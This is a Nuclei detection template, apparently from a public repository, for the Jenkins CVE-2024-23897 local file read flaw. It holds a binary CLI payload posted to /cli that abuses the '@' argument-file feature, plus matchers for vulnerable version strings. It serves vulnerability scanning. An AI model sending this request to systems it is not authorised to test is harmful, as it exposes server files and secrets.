hackeronetest / cve-2024-23897.yaml
fingerprinted's picture
Add 2 files
7bba810 verified
id: CVE-2024-23897
info:
name: Jenkins LFI Vulnerability CVE-2024-23897
author: katmaca
severity: high
description: This template serves as a crucial warning to all users if the CVE-2024-23897 local file vulnerability is detected within your system, it is imperative to take immediate action and patch your systems without delay. This vulnerability poses a significant risk to the security and integrity of your system, potentially allowing unauthorized access to sensitive files and data
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-23897
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-23897
variables:
payload: "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
http:
- method: POST
path:
- "{{BaseURL}}/cli?remoting=false"
headers:
Side: upload
Session: b442300c-63e4-45c9-8011-6555a78331ee
Content-Type: application/octet-stream
body: "{{payload}}"
matchers:
- type: regex
regex:
- Jenkins ([0-2]+.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))
- type: regex
part: header
regex:
- X-Jenkins[:] ([0-2]+.(([0-3]+[0-9]*)|4[0-3]+[0-9]*|440|441))